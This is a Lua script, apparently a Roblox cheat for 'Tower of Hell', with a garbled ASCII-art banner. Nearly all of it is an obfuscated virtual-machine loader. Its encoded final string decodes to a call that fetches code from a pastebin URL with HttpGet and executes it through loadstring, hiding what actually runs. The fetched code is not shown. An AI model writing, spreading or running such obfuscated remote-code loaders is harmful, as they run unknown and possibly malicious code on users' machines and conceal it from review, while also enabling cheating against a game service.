--[[
 

â–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ•— â–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ•—â–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ•—  â–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ•— â–ˆâ–ˆâ•—   â–ˆâ–ˆâ•—â–ˆâ–ˆâ–ˆâ•—   â–ˆâ–ˆâ•—â–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ•—     
â–ˆâ–ˆâ•”â•â•â–ˆâ–ˆâ•—â–ˆâ–ˆâ•”â•â•â•â•â•â–ˆâ–ˆâ•”â•â•â–ˆâ–ˆâ•—â–ˆâ–ˆâ•”â•â•â•â–ˆâ–ˆâ•—â–ˆâ–ˆâ•‘   â–ˆâ–ˆâ•‘â–ˆâ–ˆâ–ˆâ–ˆâ•—  â–ˆâ–ˆâ•‘â–ˆâ–ˆâ•”â•â•â–ˆâ–ˆâ•—    
â–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ•”â•â–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ•—  â–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ•”â•â–ˆâ–ˆâ•‘   â–ˆâ–ˆâ•‘â–ˆâ–ˆâ•‘   â–ˆâ–ˆâ•‘â–ˆâ–ˆâ•”â–ˆâ–ˆâ•— â–ˆâ–ˆâ•‘â–ˆâ–ˆâ•‘  â–ˆâ–ˆâ•‘    
â–ˆâ–ˆâ•”â•â•â–ˆâ–ˆâ•—â–ˆâ–ˆâ•”â•â•â•  â–ˆâ–ˆâ•”â•â•â–ˆâ–ˆâ•—â–ˆâ–ˆâ•‘   â–ˆâ–ˆâ•‘â–ˆâ–ˆâ•‘   â–ˆâ–ˆâ•‘â–ˆâ–ˆâ•‘â•šâ–ˆâ–ˆâ•—â–ˆâ–ˆâ•‘â–ˆâ–ˆâ•‘  â–ˆâ–ˆâ•‘    
â–ˆâ–ˆâ•‘  â–ˆâ–ˆâ•‘â–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ•—â–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ•”â•â•šâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ•”â•â•šâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ•”â•â–ˆâ–ˆâ•‘ â•šâ–ˆâ–ˆâ–ˆâ–ˆâ•‘â–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ•”â•    
â•šâ•â•  â•šâ•â•â•šâ•â•â•â•â•â•â•â•šâ•â•â•â•â•â•  â•šâ•â•â•â•â•â•  â•šâ•â•â•â•â•â• â•šâ•â•  â•šâ•â•â•â•â•šâ•â•â•â•â•â• 
                 Tower of Hell Script Remastered ðŸ˜€
                 Also dont Skid.. Please :)

i love you â¤ï¸
Adding more stuff in the future
]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v81=v2(v0(v30,16));if v19 then local v91=v5(v81,v19);v19=nil;return v91;else return v81;end end end);local function v20(v31,v32,v33)if v33 then local v82=0 -0 ;local v83;while true do if (v82==0) then v83=(v31/(2^(v32-(2 -(1638 -(1523 + 114))))))%(((3 + 0) -1)^(((v33-(2 -1)) -(v32-1)) + (620 -(555 + 64)))) ;return v83-(v83%(932 -(857 + 74))) ;end end else local v84=568 -((523 -156) + 201) ;local v85;while true do if (v84==(927 -(214 + (1778 -(68 + 997))))) then v85=2^(v32-(1 + 0)) ;return (((v31%(v85 + v85))>=v85) and (1 + 0)) or (877 -(282 + 595)) ;end end end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + (1272 -(226 + 1044)) );v18=v18 + (8 -6) ;return (v36 * (373 -(32 + 85))) + v35 ;end local function v23()local v37=0 -0 ;local v38;local v39;local v40;local v41;while true do if (v37==((636 -285) -(87 + 263))) then return (v41 * (16777396 -(67 + 113))) + (v40 * (64226 + 1310)) + (v39 * (57 + 199)) + v38 ;end if (v37==(957 -(650 + 242 + 65))) then v38,v39,v40,v41=v1(v16,v18,v18 + ((1004 -(915 + 82)) -4) );v18=v18 + (6 -2) ;v37=2 -1 ;end end end local function v24()local v42=0;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==((1 + 1) -1)) then v45=1;v46=(v20(v44,1 + 0 + (885 -(261 + 624)) ,26 -6 ) * ((1189 -(1069 + 118))^(72 -40))) + v43 ;v42=3 -1 ;end if (v42==(1 + (3 -1))) then if (v47==(0 -0)) then if (v46==(0 + 0)) then return v48 * (791 -(368 + 423)) ;else local v101=0 -0 ;while true do if (v101==(18 -(10 + 8))) then v47=3 -2 ;v45=442 -(416 + 26) ;break;end end end elseif (v47==(6535 -4488)) then return ((v46==(0 + 0)) and (v48 * ((1 -(1080 -(1020 + 60)))/(438 -(145 + 293))))) or (v48 * NaN) ;end return v8(v48,v47-(1453 -(44 + 386)) ) * (v45 + (v46/((1488 -(998 + 488))^((1440 -(630 + 793)) + 35)))) ;end if (v42==0) then v43=v23();v44=v23();v42=1 + (0 -0) ;end if (v42==(774 -(201 + 571))) then v47=v20(v44,1159 -(116 + 1022) ,128 -97 );v48=((v20(v44,19 + 13 )==(3 -(9 -7))) and  -(3 -2)) or (860 -(814 + 45)) ;v42=7 -4 ;end end end local function v25(v49)local v50=0 + 0 ;local v51;local v52;while true do if (v50==(6 -4)) then v52={};for v92=(3161 -(447 + 966)) -(760 + 987) , #v51 do v52[v92]=v2(v1(v3(v51,v92,v92)));end v50=3 + 0 ;end if (v50==0) then v51=nil;if  not v49 then v49=v23();if (v49==(1913 -(1789 + 124))) then return "";end end v50=1056 -(87 + 968) ;end if (v50==((2105 -1336) -(745 + 21))) then return v6(v52);end if (v50==(1 + 0)) then v51=v3(v16,v18,(v18 + v49) -(1 + 0) );v18=v18 + v49 ;v50=5 -3 ;end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v53=0 -0 ;local v54;local v55;local v56;local v57;local v58;local v59;local v60;while true do if ((115 -(4 + 110))~=v53) then else local v88=584 -(57 + 527) ;while true do if ((0 -0)~=v88) then else v56=nil;v57=nil;v88=1 -0 ;end if (v88==(2 -1)) then v53=287 -(134 + 151) ;break;end end end if (3==v53) then v60=nil;while true do local v94=1665 -(970 + 695) ;while true do if (v94==0) then if (v54~=(1 -0)) then else local v102=103 -(17 + 86) ;while true do if (v102~=(1990 -(582 + 1408))) then else v59=v23();v60={};v102=3 -2 ;end if (v102==(1 -0)) then for v142=1,v59 do local v143=0 -0 ;local v144;local v145;local v146;while true do if (v143==(1824 -(1195 + 629))) then v144=0 -0 ;v145=nil;v143=1;end if (v143~=(242 -(187 + 54))) then else v146=nil;while true do if (v144~=0) then else local v158=0 -0 ;while true do if (1==v158) then v144=1 + 0 ;break;end if ((0 + 0)==v158) then v145=v21();v146=nil;v158=1;end end end if (v144~=(781 -(162 + 618))) then else if (v145==1) then v146=v21()~=0 ;elseif (v145==(2 + 0)) then v146=v24();elseif (v145==3) then v146=v25();end v60[v142]=v146;break;end end break;end end end v58[2 + 1 ]=v21();v102=3 -1 ;end if (v102==(2 -0)) then v54=2;break;end end end if (v54~=(1257 -(1043 + 214))) then else v55={};v56={};v57={};v58={v55,v56,nil,v57};v54=1637 -(1373 + 263) ;end v94=1001 -(451 + 549) ;end if (v94~=1) then else if (v54==(1 + 1)) then for v103=1 -0 ,v23() do local v104=0 -0 ;local v105;while true do if (v104~=(1384 -(746 + 638))) then else v105=v21();if (v20(v105,1,1 + 0 )~=(0 -0)) then else local v152=0;local v153;local v154;local v155;local v156;local v157;while true do if (v152==(341 -(218 + 123))) then v153=1581 -(1535 + 46) ;v154=nil;v152=1 + 0 ;end if (v152==(2 + 0)) then v157=nil;while true do if (v153==(1 + 0)) then local v160=0;while true do if ((850 -(20 + 830))==v160) then v156=nil;v157=nil;v160=561 -(306 + 254) ;end if (v160==(1 + 0)) then v153=3 -1 ;break;end end end if ((1469 -(899 + 568))==v153) then while true do if (v154~=(1 + 1)) then else if (v20(v156,739 -(542 + 196) ,1)==(1 + 0)) then v157[3 -1 ]=v60[v157[4 -2 ]];end if (v20(v156,1 + 1 ,2)~=1) then else v157[606 -(268 + 335) ]=v60[v157[293 -(60 + 230) ]];end v154=3;end if (v154==(573 -(426 + 146))) then local v161=0;while true do if (v161~=(1 + 0)) then else v154=1458 -(282 + 1174) ;break;end if (v161==(811 -(569 + 242))) then v157={v22(),v22(),nil,nil};if (v155==(0 + 0)) then local v169=0;local v170;while true do if (v169~=(0 -0)) then else v170=1121 -(118 + 1003) ;while true do if (v170==(1024 -(706 + 318))) then v157[8 -5 ]=v22();v157[4]=v22();break;end end break;end end elseif (v155==1) then v157[380 -(142 + 235) ]=v23();elseif (v155==(1253 -(721 + 530))) then v157[1274 -(945 + 326) ]=v23() -((4 -2)^16) ;elseif (v155==(1 + 2)) then local v175=0 + 0 ;local v176;local v177;while true do if (v175~=(978 -(553 + 424))) then else while true do if (v176==(700 -(271 + 429))) then v177=0;while true do if ((0 + 0)~=v177) then else v157[3 + 0 ]=v23() -((1502 -(1408 + 92))^(16 + 0)) ;v157[1090 -(461 + 625) ]=v22();break;end end break;end end break;end if (v175~=(1288 -(993 + 295))) then else local v178=0;while true do if (v178==(1 + 0)) then v175=1172 -(418 + 753) ;break;end if (v178==(0 + 0)) then v176=0;v177=nil;v178=2 -1 ;end end end end end v161=1;end end end if (v154==(7 -4)) then if (v20(v156,2 + 1 ,1 + 2 )==(1 + 0)) then v157[4]=v60[v157[2 + 2 ]];end v55[v103]=v157;break;end if (v154==(0 -0)) then v155=v20(v105,755 -(239 + 514) ,1 + 2 );v156=v20(v105,533 -(406 + 123) ,1775 -(1749 + 20) );v154=1 + 0 ;end end break;end if (v153~=0) then else v154=1322 -(1249 + 73) ;v155=nil;v153=1 + 0 ;end end break;end if (v152==(1 + 0)) then v155=nil;v156=nil;v152=2;end end end break;end end end for v106=1 + 0 ,v23() do v56[v106-(1146 -(466 + 679)) ]=v28();end return v58;end break;end end end break;end if ((0 -0)~=v53) then else local v89=0;while true do if (v89==(2 -1)) then v53=1901 -(106 + 1794) ;break;end if (v89~=(0 + 0)) then else v54=0;v55=nil;v89=1 + 0 ;end end end if (v53==(733 -(476 + 255))) then local v90=0;while true do if (v90==(0 -0)) then v58=nil;v59=nil;v90=1;end if ((1 + 0)==v90) then v53=5 -2 ;break;end end end end end local function v29(v61,v62,v63)local v64=v61[1];local v65=v61[2];local v66=v61[3];return function(...)local v67=v64;local v68=v65;local v69=v66;local v70=v27;local v71=1;local v72= -1;local v73={};local v74={...};local v75=v12("#",...) -1 ;local v76={};local v77={};for v86=0,v75 do if (v86>=v69) then v73[v86-v69 ]=v74[v86 + 1 ];else v77[v86]=v74[v86 + 1 ];end end local v78=(v75-v69) + 1 ;local v79;local v80;while true do local v87=0;while true do if (v87==1) then if (v80<=3) then if (v80<=1) then if (v80==0) then do return;end else local v108=v79[2];v77[v108]=v77[v108](v13(v77,v108 + 1 ,v72));end elseif (v80==2) then v77[v79[2]]();else local v110=0;local v111;local v112;while true do if (v110==0) then v111=v79[2];v112=v77[v79[3]];v110=1;end if (v110==1) then v77[v111 + 1 ]=v112;v77[v111]=v112[v79[4]];break;end end end elseif (v80<=5) then if (v80>4) then v77[v79[2]]=v79[3];else v77[v79[2]]=v63[v79[3]];end elseif (v80>6) then local v117=v79[2];local v118,v119=v70(v77[v117](v13(v77,v117 + 1 ,v79[3])));v72=(v119 + v117) -1 ;local v120=0;for v136=v117,v72 do v120=v120 + 1 ;v77[v136]=v118[v120];end else local v121;local v122,v123;local v124;local v125;v77[v79[2]]=v63[v79[3]];v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]=v63[v79[3]];v71=v71 + 1 ;v79=v67[v71];v125=v79[2];v124=v77[v79[3]];v77[v125 + 1 ]=v124;v77[v125]=v124[v79[4]];v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]=v79[3];v71=v71 + 1 ;v79=v67[v71];v125=v79[2];v122,v123=v70(v77[v125](v13(v77,v125 + 1 ,v79[3])));v72=(v123 + v125) -1 ;v121=0;for v139=v125,v72 do v121=v121 + 1 ;v77[v139]=v122[v121];end v71=v71 + 1 ;v79=v67[v71];v125=v79[2];v77[v125]=v77[v125](v13(v77,v125 + 1 ,v72));v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]();v71=v71 + 1 ;v79=v67[v71];do return;end end v71=v71 + 1 ;break;end if (0==v87) then v79=v67[v71];v80=v79[1];v87=1;end end end end;end return v29(v28(),{},v17)(...);end v15("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403213O00682O7470733A2O2F706173746562696E2E636F6D2F7261772F4C4E78426351677100083O0012063O00013O00122O000100023O00202O00010001000300122O000300046O000100039O0000026O000100016O00017O00",v9(),...);
